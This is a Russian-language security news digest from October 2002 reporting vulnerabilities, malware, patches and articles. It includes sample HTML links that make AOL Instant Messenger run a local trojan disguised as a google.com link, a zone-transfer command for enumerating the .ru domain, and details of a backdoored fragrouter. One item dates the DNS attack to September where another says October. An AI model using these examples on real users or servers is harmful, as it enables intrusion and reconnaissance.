ERRor из Domain Hell Team обнаружил уязвимость в Norton Antivirus Corporate Edition. Суть уязвимости в следующем. При инсталлировании Norton Antivirus, он добавляет в контекстное меню проводника (Explorer) пункт "Scan for Viruses...", при помощи которого можно запустить приложение в контексте Local System. Запущенное приложение имеет кнопку "Help", при помощи которой запускается файл winhlp32 также в контексте Local System. winhlp32 позволяет пользователю запустить произвольный код с полномочиями запустившего приложения (в данном случае Local System). Опубликовано в BUGTRAQ 3APA3A. Ccылка - http://www.security.nnov.ru/search/document.asp?docid=3675
24/10/2002 17:25 Началось бета-тестирование Service Pack 4 для Windows 2000.
Компания Microsoft начала бета-тестирование четвертого пакета обновлений для операционной системы Windows 2000. На сайте premier.microsoft.com сообщается, что разработчикам нужны активные бета-тестеры, дающие компании полезную информацию о работе программных продуктов для разработки SP4 для Windows 2000. Третий пакет обновлений для операционной системы Windows 2000 был выпущен в конце июля этого года. С тех пор в этой операционной системе и поставляющихся вместе с ней программных продуктах были обнаружены несколько уязвимостей и недоработок. В настоящее время на сайте Windows Update для Windows 2000 с установленным SP3 предлагаются 8 критических обновлений и 3 рекомендуемых. Эти обновления, скорее всего, лягут в основу четвертого пакета обновлений для операционной системы Windows 2000. Пока неизвестно, сколько продлится разработка Service Pack 4, и когда пакет обновлений будет выпущен. Источник - http://premier.microsoft.com
24/10/2002 17:20 Банки вынуждены нарушать закон из-за лицензионной политики Microsoft.
Финансовые организации, использующие программное обеспечение Microsoft, оказались в сложной правовой ситуации из-за новой лицензионной политики софтверной компании. Последние версии ПО от Microsoft, в частности, Windows XP SP1 и Windows 2000 SP3, поставляются с обновленным лицензионным соглашением, в котором предусмотрено право Microsoft на доступ к информации на компьютерах пользователей. По мнению Лестера Уорби, руководителя информационной службы банка Credit Union в Сиэтле, такое требование идет вразрез с федеральным законом, который должен вступить в действие в мае 2003 года. Данный закон запрещает передачу данных о клиентах финансовых организаций третьим лицам. Вместе с тем, чтобы использовать ПО Microsoft, банку необходимо согласиться с требованиями софтверной компании на передачу информации с компьютеров, что ставит финансовые компании в неудобное положение. В европейских странах законодательство, ограничивающее распространение информации о клиентах банков, еще более строгое, чем в США. "Мы не по своей воле оказались в ситуации, когда мы либо нарушаем лицензию Microsoft, либо нарушаем закон", - заявил Лестер Уорби, добавив, что "при таких обстоятельствах, скорее всего, придется сменить операционную систему". Если Microsoft не изменит правил лицензирования, банк Уорби планирует перевести серверы данных под управление ОС Novell или Linux. Источник - http://www.compulenta.ru
24/10/2002 15:50 Cтатья "Open Source: A False Sense of Security?".
Вашему вниманию предлагается статья, в которой эксперты по безопасности рассуждают о якобы большей безопасности софта, поставляемого в исходных кодах (Open Source). Cобственно, вывод получается следующий: софт в исходных кодах не является более безопасным, такое ощущение возникает просто потому, что уязвимости в нём "латаются" намного быстрее, отчего и возникает чувство большей безопасности. Возникает вполне резонный вопрос-почему софтверные гиганты, располагая огромным штатом специалистов (программистов, администраторов, специалистов по безопасности) не в состоянии реагировать с такой же скоростью, как группа (пусть и большая) энтузиастов, занимающихся развитием свободного ПО в большинстве случаев в качестве хобби? Статья - http://www.eweek.com/article2/0,3959,562220,00.asp
24/10/2002 15:20 Недавнюю атаку на корневые DNS сервера провела Nerf Security Group.
На сайте SecurityLab сообщается, что атака на DNS-сервера, о который вчера сообщалось, была осуществлена Nerf Security Group, а точнее одним из ее бывших членов ech0. В результате атаки в понедельник 21 сентября в течении часа были выведены из строя 7 из 13 корневых DNS серверов, расположенных в США. Это уже не первая "диверсия" Nerf Security Group против США. Nerf Security Group в сентябре взломал сайт госдепартамента США, взлом которого в начале был принят за террористический акт Бен Ладена. Источник - http://www.securitylab.ru
24/10/2002 15:15 Уязвимость в Web Server 4 Everyone.
Тамер Сахин из SecurityOffice сообщает об уязвимости, обнаруженной в продукте Web Server 4 Everyone - Интернет и Интранет-сервере с HTTP-сервисом. Уязвимости подвержена версия для ОС Windows. При посылке в качестве аргумента GET-запроса 2000 символов и содержимом поле "Host:" 127.0.0.1 cервер падает (DoS). Баг присутствует в версии 1.28 под управлением ОС Win2K SP3, Win98 SE. Выпущен эксплоит на Перле. Подробности - http://www.securityoffice.net/articles/w4e/
24/10/2002 14:50 Уязвимость в MIT Kerberos.
Том Ю из Массачусетского технологического университета (MIT) раскрывает подробности уязвимости, найденной в системе создания защищённого соединения Kerberos. Сообщается, что уязвимость скрывается в kadmind4-демоном, предназначенным для работы MIT Kerberos 5 с 4-й версией этого продукта. При получении переполнения буфера возникает возможность выполнения критичного кода в системе от имени пользователя, запустившего kadmind4 (обычно root). Для выполнения атаки не требуется авторизации в системе Kerberos. Известен, как минимум, один широко известный экплоит этой уязвимости. Относительно природы уязвимости сообщается, что функция kadm_ser_in() передаёт размещаемый буфер(содержащийся в запросе на чтение из сети) и его длину. При этом поле длины не проверяется и, сформировав запрос с отрицательным или бОльшим выделяемого размера полем длины, можно получить переполнение при следующем вызове memcpy() в структуре authent.dat. Автор выпустил патч для устранения уязвимости. Переполнению буфера подвержены версии MIT Kerberos 5 до 5-1.2.6, а также различные приложения на базе MIT Kerberos 4, включая Cygnus Network Security (CNS). Страница с описанием и патчем - http://web.mit.edu/kerberos/www/advisories/index.html
23/10/2002 21:7 На сайте новая статья: Построение сети с разделением трафика на базе iptables & ip route.
В статье рассказывается и показывается в примерах, как на базе Линукса сделать шлюз с разделением трафика по двум каналам и учетом его для пользователей. Данный метод используется, например, для разделения траффика идущего за границу и российского трафика. Ознакомиться: http://www.uinc.ru/articles/37/index.shtml
23/10/2002 16:25 Крупнейшая атака на корневые DNS-серверы за всю историю интернета.
Американские спецслужбы сообщили о самой серьезной атаке на корневые DNS-серверы за всю историю интернета. По информации Центра защиты национальной инфраструктуры ФБР США, во время атаки семь из тринадцати серверов, управляющих главными магистралями интернета, перестали отвечать на запросы пользователей, работа еще двух серверов время от времени прерывалась. Атака была предпринята в понедельник 21 октября, примерно в 16:45 по времени восточного побережья США (0:45 вторника 22 октября по московскому времени). На корневые серверы было отправлено огромное количество неправильных запросов. В результате, нагрузка на серверы в 30-40 раз превысила обычную. Серьезных перебоев в работе Сети не произошло лишь из-за небольшой продолжительности атаки - она длилась всего один час. Стабильности работы интернета способствовало и то, что многие провайдеры кэшируют данные из других сегментов Сети для ускорения доступа к ним. Однако в случае более продолжительной атаки или выхода из строя большего числа корневых серверов, нормальная работа интернета могла бы быть нарушена. По информации агентства Reuters, в число наиболее сильно пострадавших от атаки root-серверов вошли компьютеры, установленные в Информационном центре министерства обороны США в городе Вена, штат Виржиния, Исследовательском центре вооруженных сил США в Абердине, штат Мэриленд, штаб-квартире ICANN в Лос-Анджелесе, Калифорния и другие. За пределами США были выведены из строя корневые серверы в Токио и Стокгольме. Источник атаки до сих пор неизвестен. ФБР, Служба внутренней безопасности и администрация президента США в настоящее время заняты расследованием обстоятельств чрезвычайного происшествия. Источник - http://story.news.yahoo.com/news?...
23/10/2002 16:20 Эксплоит для Win RPC DoS.
Выпущен эксплоит для уязвимости, обнаруженной в реализации RPC на Win-платформах. Постарались китайские товарищи. Представляет собой адаптированный под winsock2 экcплоит SPIKE. Исходник - http://www.cnhonker.net/Files/show.php?id=280
23/10/2002 15:56 Перенос irc-канала завершен.
Теперь irc-канал #uinc нашей группы находится в сети irc.iskra.ru. /server irc.iskra.ru /join #uinc Сайт irc-канала: http://rook.uinc.ru/irc/
23/10/2002 15:12 Уязвимость в Windows 2K.
Chris Anley из Next Generation Security Software обнаружил уязвимость в реализации SNMP операционной системы Windows 2000, которой подвержены все версии этой ОС до Win2K SP3. Заключается она в том, что при посылке SNMP-запросов к принтеру (обект базы управляющей информации LANMAN MIB) и отключённом сервисе спуллинга печати, обработка каждого из таких запросов "съедает" около 30 МБ памяти. Таким образом выдав определённое количество запросов можно привести сервер в неработоспособное состояние. Объектом LANMAN MIB управляет библиотека lmmib2.dll. Тип запросов, которые необходимо выдавать - 'GET' или 'GETNEXT'. Для выполнения атаки можно воспользоваться либо утилитой SNMPUtil из состава Windows 2000 resource kit, либо утилитой 'snmplib', разработанной NGS Software. Пример формирования запросов - на приведённой ниже ссылке. Для предотвращения атаки автор рекомендует три пути: Сервис пак 3 от Microsoft, ограничение доступа к серверу при помощи SNMP-запросов (консольный плагин 'security'), использование IPSec-туннеля между управляющей станцией и сервером. Подробности - http://www.nextgenss.com/advisories/snmp_dos.txt
23/10/2002 14:55 Очередная серия уязвимостей в Internet Explorer.
GreyMagic Software из Израиля "порадовала" Microsoft Обнаружением очередной пачки уязвимостей в броузере Internet Explorer. Как утверждается, все они присутствуют в версиях IE до версии 6 SP1 (хотя позже один из исследователей заявил, что одна из уязвимостей - external metod flaw, присутствует и в версии 6 SP1). Также уязвимы приложения, использующие движок IE (WebBrowser control) - AOL Browser, MSN Explorer, etc. Уязвимость связана с некорректным механизмом кэширования объектов, поскольку система безопасности IE предполагает, что при взаимодействии объектов windows обе страницы находятся в одной зоне безопасности и одном домене, что далеко не всегда оказывается верным (особенно, если "помочь" сделать так, чтобы это оказалось не верным-чему, собчтвенно и посвящён отчёт). Использовать уязвимость можно либо через специальным образом офрмленную Web-страницу, либо посредством пересылки HTML-сообщения по электронной почте. Использование уязвимости позволяет получить доступ к любой странице DOM (Document Object Model) любой зоны любого домена. Это может позволить читать cookies любого домена, подменять содержимое любого URL, читать содержимое локальных файлов и выполнять команды. Авторы также выпустили универсальный эксплоит, который после подставления соотв. содержимого одной из уязвимостей позволяет проверить её на практике. В качестве меры противодействия советуют либо отключить Active Scripting, либо обновиться до IE6 SP1 (что вообщем-то логично). Подробное описание - http://security.greymagic.com/adv/gm012-ie/
23/10/2002 14:28 Объявлен сбор материалов для Black Hat Briefings Windows Security.
Джефф Мосс, координатор проекта Black Hat, объявил о начале сбора материалов для брифинга "Безопасность Windows", который состоится 26-27 февраля 2003 г. в Сиэтле, штат Вашингтон. Брифинг будет посвящён исключительно безопасности операционных систем семейства Windows. Конференции Black Hat Примечательны тем, что в них принимают участие только спецталисты по компьютерной безопасности, исследующие уязвимость в Win-ОС, а также пишущие различные секьюрити инструменты. Ни один из промышленных официальных представителей на подобные конференции не приглашается. Если у Вас есть, что сказать на брифинге-Вы можете до 15 декабря сего года подать заявку. Call For Papers (CFP) - http://www.blackhat.com/html/win-usa-03/win-usa-03-cfp.html
23/10/2002 14:17 Обновления в NetBSD.
Вчера NetBSD Foundation, Inc. выпущены 2 бюллетеня по безопасности, связанные с обновлениями в этой операционной системе: SA2002-026, SA2002-016. Первый из них касается устранения переполнения буфера в kadmind - сервере, предоставляющем административный доступ к базе данных Kerberos (устанавливается при инсталляции Heimdal Kerberos implementation). В Heimdal релизах раньше, чем 0.5.1 содержится переполнение буфера. До обновления kadmind рекомендуется отключить сервис в /etc/services и убить демона kadmind. После этого скачать новую версию из соответствующей ветки (NetBSD-1.5, 1.6, current) репозитария CVS: crypto/dist/heimdal/kadmin и обновиться. Второй бюллетень касается уязвимости, обнаруженной в реализации IPSec-протокола (мы об этом сообщали вчера). Как говорится в бюллетенях, обновляться необходимо только в том случае, если активизован механизм IPsec ESP (опция IPSEC_ESP в ядре). Для обновления необходимо скачать из CVS новое ядро и пересобрать его, пользуясь инструкциями по построению ядра. Источник - http://www.NetBSD.ORG/Security/
23/10/2002 13:57 Уязвимость в AIM 4.8.2790.
Сообщается об уязвимости в AOL Instant Messenger версии 4.8.2790. При "клике" мышью на гипертекстовой ссылке может выполниться команда на машине пользователя. Удалённый "злоумышленник" может послать заранее оформленный URL, cодержащий ссылку на выполнимый локальный файл. Если "жертва" нажмёт клавишей мышки на подобную ссылку-будет выполнен докальный файл без всякого предупреждения. Единственным ограничением в этом случае является только то, что в пути ссылки не должно быть пробелов, поскольку они фильтруются. Доступ к длинным именам системных папок (например, Program Files) можно заменять их DOS-интерпретацией ("progra~1"). Примеры подобных ссылок: <a href = "notepad.exe">hi</a> <a href = "../../../../progra~1/trojan/trojan.exe">www.google.com</a>. AOL на ипсьмо автора уязвимости не ответила. В качестве рекомендации советуют перейти на версию AIM 5.0.2938 и не жать на все ссылки подряд, не проверив, что за ними скрывается. Источник - http://www.securityfocus.com
23/10/2002 13:21 Статья "Linux security mini-HOWTO".
Вашему вниманию предлагается статья автора Ника Мащенко из GU Telco, Киев "Linux security mini-HOWTO", выложенная автором для изучения и обсуждения. Как пишет сам автор, он написал этот документ, попытавшись свести вместе самую необходимую информацию из различных документов (Security, Firewall-HOWTO, TrinityOS, LASG, Hacker's guide etc.) для того, чтобы вкратце описать все необходимые шаги от момента установки "сырой" версии Linux до выхода в Интернет (где, собственно и возникает острая необходимость в максимальной безопасности сервера). Читайте, изучайте, находите ошибки. Контактный адрес автора приведён в статье. Любые исправления/дополнения приветствуются. Статья - http://mnv.ath.cx/mnv/linux/lsmht/
22/10/2002 17:50 Cтатья "GRUB in Debian HOWTO".
Dan McCombs написал руководство (HOWTO) по новому загрузчику, пришедшему на смену традиционному LILO в дистрибутиве LINUX Debian. Называется загрузчик GRUB. В руководстве рассказывается, как инсталлировать загрузчик GRUB, как его конфигурировать, как создать загрузочную дискету GRUB, как держать копии GRUB при обновлении ядра и ещё много всяких КАКов. Администраторам/пользователям, применяющим GRUB рекомендуется, а также тем, кто хочет перейти от LILO к GRUB. Cтатья - http://www.linuxorbit.com/modules.php?...
22/10/2002 17:40 Хакеры взломали обновленную защиту Xbox.
Обновленная система безопасности, примененная в игровой приставке Xbox, продержалась менее трех недель. На сайте GamesIndustry.Biz сообщается, что хакеры взломали защиту игровой приставки практически сразу же, как только новые модели устройства появились на рынке. Усовершенствованную защиту Xbox взломала британская группа хакеров, добившаяся значительных успехов в установке операционной системы Linux на игровую приставку. Взлом защиты Xbox, скорее всего, приведет к тому, что производители мод-чипов (микросхем, использующихся для обхода защиты от запуска неавторизованного ПО на приставке) в ближайшее время выпустят новую модель модификационных устройств. Примечательным фактом является то, что несколько хакеров, работающих над взломом средств защиты в Xbox, считают, что игровая приставка используется компанией Microsoft в качестве "испытательного полигона" для технологии Palladium - программно-аппаратного решения для компьютеров будущего, препятствующего незаконному копированию мультимедийного контента, защищенного авторским правом. Источник - http://www.compulenta.ru/2002/10/22/34841/
22/10/2002 17:33 Обнаружена возможность DoS-атаки в нескольких реализациях IPSec-протокола.
Ошибка, обнаруженная в большинстве ipsec выполнениях, связана с тем, что не производится проверка, присутствуют ли auth данные, или такие проверки недостаточны или неправильны. В результате, подделанный esp пакет с известным источником, адресатом, SPI и большим sequence number, приведет к зависанию системы. Подробности - http://www.securitylab.ru/?ID=25175
22/10/2002 17:23 SCO выпускает заплаты для UnixWare 7.1.1 и Open UNIX 8.0.0.
SCO выпустила бюллетень по безопасности CSSA-2002-SCO.41, в котором утверждается следующее: при попытке пользователя выполнить команду rcp (удалённое копирование файлов с системы на систему) /proc вся система приходит в неработоспособное состояние. Для устранения этой уязвимости SCO выпустила патчи erg712112c.pkg.Z - для UnixWare 7.1.1, erg712112d.pkg.Z - для Open UNIX 8.0.0. Подробности - ftp://ftp.sco.com/pub/updates/OpenUNIX/CSSA-2002-SCO.41
22/10/2002 15:50 Троян в fragrouter.
Fragrouter - программа, предназначенная для обхода/обмана систем определения вторжения (IDS), которая позволяет скрыть атаку, разбивая её на фраменты IP. Как сообщается, что 18, 19 октября на сайте разработчика лежала версия 1.7, заражённая троянцем. Заражённая версия была убрана 19 октября после того, как автору проэкта (Matt) о заражении сообщил Hank Leininger. Как утверждает сам автор, версии 1.7 не существует в природе, последняя версия fragrouter 1.6, работы над которой не ведутся уже 3 года. Анализ кода показал, что код трояна анлогичен коду троянцев, внедрённых ранее в irssi, fragroute, BitchX, OpenSSH и Sendmail. В конфигурационный скрипт была внедрена С-программа, которая после запуска скрипта открывала на сайте шелл на порту 6667. Интересна технология определения адреса, на котором открывался шелл. Для этого создавался файл http://www.anzen.com/images/anzen-title_r3_f2_c4.jpg, содержащий строку вида IPDATAN (N-IP-адрес жертвы). На момент анализа кода эта строка содержала данные `IPDATA210.224.164.100`, что позволяет судить о том, что шелл на порту 6667 был открыт по адресу 210.224.164.100 (хозяин оповещён, порт закрыт). Отличие от предыдущих версий: вместо команд 'A', 'D', & 'M' теперь выполняются команды 'B', 'G', & 'K'. В троян включена довольно занимательная строка, выдающая происхождение автора трояна :) Привожу, как есть: # МИЛ.йаисисрэйа(2недели)ффинсд/туоргарф(21/2недели)СКИчтиБ(3недели) # ЦРУ.зллоркс(6месяцев)шсснепо(1неделя,п,3дня)лйемднес(1неделя) # ВСЕ.Наташа, все презервативы закончились, принеси еще. Подробный текст трояна приведён в ссылке ниже. Подробности - http://archives.neohapsis.com/archives/vulnwatch/2002-q4/0033.html
22/10/2002 14:10 Уязвимость в NOCC.
Ulf Harnhammar из Швеции обнаружил уязвимость типа XSS (Cross-Site scripting) в пакете NOCC. Этот пакет является простым Вэб-ориентированным почтовым клиентом, способным работать по протоколам POP3, SMTP, IMAP. Написан на языке PHP. Распространяется на условиях лицензии GPL, входит в состав дистрибутива Debian GNU/Linux и портов FreeBSD. Обнаружено 2 вида уязвимостей. Первая из них заключается в том, что если в заголовке письма указан тип MIME-text/plain, программа не удаляет из тела письма тэги HTML - сообщение показывается в "диком" виде (как есть). Вторая уязвимость связана с тем, что коды HTML Не убираются из заголовка письма-полей Subject и Date. Обе указанные уязвимости при проведении атаки типа XSS позволяют злоумышленнику захватить почтовый эккаунт жертвы или выполнить определённые действия против адресата письма, просто послав соответствующий E-mail. Автор написал патч, устраняющий эту уязвимость. Подробности - http://archives.neohapsis.com/archives/vulnwatch/2002-q4/0031.html
22/10/2002 1:1 Уязвимость в PostgreSQL.
По сообщениям с linuxtoday.com, версии популярного сервера RDBM PostgreSQL, входящие в состав немецкого дистрибутива SuSE, подвержены переполнению буфера, благодаря чему злоумышленник может повысить уровень привилегий на удаленной машине до пользователя, с чьим uid был запущен postmaster. Подвержены уязвимости следующие версии дистрибутива: 7.0, 7.1, 7.2, 7.3, 8.0, SuSE eMail Server 3.1, SuSE eMail Server III. Источник - http://linuxtoday.com/news_story.php3?ltsn=2002-10-21-018-26-SC-SW-SS
21/10/2002 22:32 Хакер пытается ограничить возможности Palladium.
Как сообщается на сайте Wired, возможности программно-аппаратной системы Palladium, направленной на защиту авторского контента, могут быть значительно ограничены благодаря усилиям хакеров. Система Palladium была разработана Microsoft для защиты цифровой музыки и видео от незаконного распространения. На коференции USENIX Security Symposium, прошедшей в августе, были высказаны опасения в том, что Palladium может использоваться и для защиты от незаконного распространения пиратских программных продуктов. И хотя представитель Microsoft Питер Бидль убеждал участников конференции, что Palladium не может быть использована для контроля за соблюдением норм лицензий на программное обеспечение, один из участников симпозиума принял дополнительные меры для того, чтобы этого не произошло. Хакер, известный под именем Lucky Green, вскоре после окончания конференции USENIX подал заявку на получение патента, описывающего методику использования Palladium для защиты от незаконного использования программного обеспечения. Хакер заявил, что не намерен применять на практике технологии, которые пытается запатентовать. Он собирается использовать эти патенты (в том случае, если он их получит), для того чтобы никто не смог внедрить подобную технологию на практике. Подробности - http://www.compulenta.ru/2002/10/21/34817/
21/10/2002 22:20 Каждое шестое письмо в Интернете-спам!
Еще несколько лет назад слово «спам» было незнакомо рядовому пользователю Интернета. Однако, сейчас непрошеные рекламные сообщения поступают на электронные адреса в таких количествах, что иногда в почтовых ящиках даже не остается места на действительно важную корреспонденцию. Так, по сведениям компании MessageLabs, в сентябре этого года практически пятая часть (17 процентов) всех пересылаемых по Сети сообщений носила рекламный характер. Из шестидесяти трех миллионов обработанных писем серверы MessageLabs отфильтровали одиннадцати миллионов. Другими словами, каждое шестое послание является спамом. Однако, опрос пользователей показал, что в действительности дела обстоят гораздо хуже: в некоторых компаниях рекламные сообщения составляют около пятидесяти процентов всей корреспонденции. И если еще полгода назад пользователи были в большей степени обеспокоены эпидемиями вирусов, то сейчас на первое место выходит проблема спама. К примеру, вирусы в сентябре содержались лишь в каждом двухсотом письме. Источник - http://www.computerra.ru/focus/new/21084/
21/10/2002 22:15 Вышёл Linux 2.5.44.
Линус Торавльдс выпустил очередной релиз девелоперского ядра Linux. Улучшен код для платформы PowerPC, проведена работа над сетевой подсистемой, usb, scsi, подсистеме драйверов. Ccылка на Changelog прилагается. Изменения - http://www.kernel.org/pub/linux/kernel/v2.5/ChangeLog-2.5.44
21/10/2002 22:10 Выход Stunnel 4.0.1.
Stunnel-многоплатформенный SSL-туннелирующий прокси. Программа предназначена для создания защищенного OpenSSL соединения между удаленным клиентом и локальным, или удаленным сервером POP2, POP3 и IMAP (который стартует через inetd). При этом модификация кода сервера не требуется. Использует библиотеки OpenSSL или SSLeay. Перечень паддерживаемых ОС впечатляет: DEC OSF, FreeBSD, HP-UX, IBM AIX, Linux, Mac OS X, NetBSD, OpenBSD, OpenVMS, SGI IRIX, Solaris, Windows 95/98/ME, Windows NT/2000/XP. Сайт проекта - http://stunnel.mirt.net/
21/10/2002 21:55 Обнаружен новый вирус!
Лаборатория Касперского обнаружил новый вирус в "диком" виде под названием Trojan.VBS.Carewmr. Как сообщается, новый вирус (другое его название Carewmr) написан на языке VBS. Проявляется вирус довольно занятно. Он удаляет содержимое директории C:\WINDOWS, после чего начинается цирк. После выполнения, троян выводит сообщение: "Welcome to CLRAV of Kaspersky Labs, press OK or Accept to Start scanning your computer." "ERROR!, Code error:3212552, please execute this tool in MS-DOS." "Thank You for prefer Kaspersky Labs Products" Но это ещё не всё. После этого он открывает сайт "http://www.avp.ru" в броузер по умолчанию. 1 сентября троян выводит сообщение: "Mr.Carew vuelve otra vez!!, jaja". Честно говоря, не совсем понятно, о каком (?) броузере по умолчанию может идти речь после удаления содержимого директории C:\WINDOWS? (прим. ньюсмейкера). Более подробно о трояне - http://www.viruslist.com/click?_URL=http://www.viruslist.com/eng/viruslist.html?id=57487
21/10/2002 15:29 Реинкарнация Opasoft: зашифрован, упакован и крайне опасен.
"Лаборатория Касперского" сообщает об обнаружении новой модификации сетевого червя "Opasoft" (также известного как "Opaserv" и "Brasil"). Уже получено несколько сообщений о регистрации случаев заражения данной вредоносной программой. Главное отличие новой модификации "Opasoft" - упаковка утилитой сжатия файлов UPX и утилитой шифрации PCPEC. Это сократило размер файла-носителя червя, изменило его внешний вид, однако не поменяло функциональность: она практически полностью соответствует оригинальной версии "Opasoft". Проблема архиваторов и утилит сжатия стоит довольно остро в современной компьютерной вирусологии. Для того чтобы сделать вредоносную программу неузнаваемой для антивируса, достаточно упаковать ее "компрессором", не меняя ее фактический функционал. После этого разработчику антивируса необходимо будет внести в антивирусную базу процедуры обнаружения этой упакованной версии, на что иногда уходит до нескольких дней. За это время вредоносная программа может проникнуть на компьютеры пользователей и нанести непоправимый вред. Источник - http://www.kaspersky.ru/
20/10/2002 19:52 Тройной патч от Microsoft.
Компания Microsoft выпустила новый патч, решающий сразу 3 проблемы в ПО OS Windows XP: уязвимость в Windows-XP Help Center (позволяющую произвести несанкционированное удаление каталогов), баг в SQL Server и в Word/Excel. Подробности - http://www.theregister.co.uk/content/55/27700.html
20/10/2002 19:42 Целительный shell.
Согласно статистике, рядовой пользователь unix системы использует не более 20% от общего количества ее консольных приложений, при этом многие с трудом представляют себе истинную силу простой консоли. Новая статья на LinuxJournal открывает таковым пользователям глаза на предмет их заблуждения. Неплохой обзор редких и довольно полезных консольных аппликаций. Ознакомиться - http://www.linuxjournal.com/article.php?sid=6158&mode=thread&order=0
20/10/2002 18:99 Cтатья "ZIP — и вас сцапали".
На сайте zdnet.ru опубликована статья Драгоса Руйу (Dragos Ruiu), называемая в оригинале "ZIP-and you're zapped", посвящённая старому доброму формату сжатия файлов ZIP. "Вам, наверное, кажется, что то антивирусное ПО, на которое вы положились, способно вылавливать искаженные ZIP-файлы, вложенные в e-mail. Не тут то было. Этот формат, в котором недавно обнаружен опасный подводный камень, шлет вам большой привет". Смысл всей статьи сводится к тому, что сама спецификация формата ZIP допускасет имена файлов длиной в 64 бита, в то время, как разработчики программного обеспечения используют библиотеки и компоненты, воспринимающие имена файлов, не превышающие по длине максимально допустимую длину имен в операционной системе (для Windows, например, это 512 байт). Особенно актуально это для разработчиков антивирусного ПО, проверяющего электронную почту. Компания Rapid7 (разработчик ZIP-файлов), проверила антивирусные шлюзы для проверки электронной почты. Все они пропустили пробный вирус, помещенный в ZIP-файл с длинным именем, — сканеры вылавливают его лишь в том случае, если он находится в «стандартном» ZIP-файле с коротким именем. Как ни странно, если сканерам не удается просканировать файл, они не считают его опасным, а помечают как проверенный и пропускают! Так что пользователь полагает, что шлюз просканировал файл, и, не колеблясь, его открывает. Проблема относится не только к операционным системам и антивирусному ПО, а ко всему на свете. ZIP с длинным именем позволяет обойти защиту самых разных приложений, таких как Lotus Notes. Статья доступна по ссылке - http://zdnet.ru/?ID=289947
20/10/2002 18:20 Статья "Как мобильные телефоны позволяют шпионить за каждым нашим движением".
На сайте www.bezpeka.com опубликован перевод статьи "How mobile phones let spies see our every move" с сайта observer.co.uk. Статья посвящена новому секретному проекту правительства Великобритании под названием Celldar, позволяющему шпионить за любым человеком, обладающим мобильным телефоном, в любое время и в любом месте, где имеется зона радиопокрытия. Статья - http://www.bezpeka.com/library/adm/celldar.html
20/10/2002 18:10 Уникальный код будет безопаснее системы логинов и паролей.
Британская компания утверждает, что разработала систему безопасности, которая сделает компьютеры более защищёнными. Вместо системы логинов и паролей технология компании Quizid использует новую систему уникальных кодов. Технология основана на использовании небольшого устройства размером с кредитную карточку, которое генерирует код доступа каждый раз, когда пользователю необходимо войти в тот или иной аккаунт. Сгенерированный код действителен на протяжении лишь небольшого периода времени и может быть использован только один раз. При работе устройство связывается с базой данных Quizid Vault; компания заверяет, что данные, содержащиеся в хранилище Quizid Vault, защищены на уровне военной информации. Компания Quizid намеревается сотрудничать как с ведущими банками, так и с жилищно-строительными кооперативами, выступая как дистрибьютор генерирующих карт. Несмотря на постоянные сообщения об атаках хакеров и случаях онлайн-мошенничества, данные опросов показывают, что большинство компаний не уделяют должного внимания выбору паролей. Так, исследование, проведённое группой Egg в этом году, показало, что 43% английских пользователей используют легкоразгадываемые пароли, например, имена любимых людей, а более половины пользователей никогда не меняют пароли, если этого не требуется. Источник - http://www.proext.com
20/10/2002 17:58 Мошенники крадут номера кредитных карт у пользователей Yahoo.
Компания Yahoo предупредила пользователей своих интернет-сервисов о том, что неизвестные мошенники могут попытаться заполучить их номера кредитных карт. Причиной тому послужила массовая почтовая рассылка, произведенная неизвестными лицами от имени Yahoo. В письмах содержалось уведомление о необходимости оплаты услуг Yahoo и запрашивался номер кредитной карты. Вскоре после этой акции мошенников Yahoo разослала своим пользователям предупреждение о том, что от ее имени действуют неизвестные злоумышленники. Сама компания никогда не запрашивает номера кредитных карт по электронной почте, а использует более надежные и безопасные средства. По всей видимости, мошенники пытаются сыграть на том, что Yahoo постепенно вводит все больше и больше платных услуг. Часть из них являются более удобными версиями существующих бесплатных сервисов. Многие услуги, ранее бывшие бесплатными, переводятся на платную основу, а кроме того, Yahoo постоянно вводит совершенно новые коммерческие сервисы. Источник - http://www.compulenta.ru
19/10/2002 22:15 Электронный вестник Лаборатории Касперского #28.
Вчера была выложена электронная газета фирмы Касперского #28 (The Kaspersky Labs Electronic Newsletter #28). В газете расписаны по разделам: сетевые черви, вирусы для Windows, вирусы Linux, троянские программы, макровирусы, вирусные конструкторы. Всего описано 11 разновидностей "зверьков". Подробности - http://www.kaspersky.ru/news.html?id=988062
19/10/2002 21:55 Возможность раскрытия полной информации о зоне корневых DNS-серверов.
Max из Тулы (rusmir@tula.net) сообщает о том, что ДНС-сервера верхнего уровня (Top Level Domain - TLD DNS-servers) могуть быть использованы для получения полной информации о всей зоне, за которой ответственен данный ДНС-сервер. Подобная возможность основана на т.н. механизме AXFR (спецификация передачи полной зонной информации. Данный механизм описан подробно в RFC 1034/1035 и предназначен для обмена информацией между корневыми ДНС-серверами. Отсутствие ограничений в передаче информации может быть использовано в целях получения информации для массовой рассылки флуда, проведения распределённых DoS-атак и т.д. (обнаружение открытых релэев-почты, прокси-серверов, серверов с определёнными типами ОС). Записи накоторых корневых ДНС-серверов содержат сотни тысяч (!) записей о серверах в их зоне ответственности. Сформировав соответствующий AXFR-запрос к DNS-серверу, получить эту информацию может любой пользователь. Совершенно очевидно, что в настоящий момент существует довольно большое количество инструментов, при помощи которых возможно получить эту информацию. Кроме того, сформировав большое количество соответствующих запросов, можно провести атаку типа DoS на соответствующие сервера. Довольно легко себе представить что произойдёт при отказе какого-нибудь из подобных серверов. Как временное решение проблемы, автор советует использовать механизм ограничения передачи передачи AXFR при помощи опции allow-transfer в BIND версий 8,9. Как указывает дальше автор ни ОДИН (!) из серверов зон .com/org/edu/net/mil/gov не поддерживает подобную передачу. Однако (!) многие сервера в других зонах поддерживают подобную передачу. Автор называет 24 подобных зоны, среди которых присутствуют хорошо нам все знакомые AU, BG, EE, ES, HU, RU(в ЭТОМ домене выдаются 600.000 (!) записей), UA. Как правильно заметил Дмитрий Леонов (www.bugtraq.ru) для получения полной информации по домену ru достаточно выполнить команду host -l ru (если она присутствует в Вашей ОС :). Источник - http://online.securityfocus.com/archive/1/296183/2002-10-16/2002-10-22/0
19/10/2002 21:23 Статья "Chrooting Daemons and System Processes HOWTO".
Объявляется об обновлении статьи "Chrooting Daemons and System Processes HOWTO", рассказывающей о настройке служб и системных процессов в среде chroot (ограничение директории (среды), в которой могут работать эти службы и процессы). Рекомендуется к прочтению администраторам серверов и сетей. Статья доступна - http://www.networkdweebs.com/chroot.html
19/10/2002 19:34 На сайте новая статья: Исследование полиморфного движка ASProtect 1.23.
В статье на примере ASProtect 1.23 рассказывается о самораспаковке кода защиты, с которой начинается выполнение защищенной программы. Исследована расшифровка секций ASProtect, способы затруднения отладки и дизассемблирования программы, применяемых при этом. Ознакомиться: http://www.uinc.ru/articles/36/index.shtml
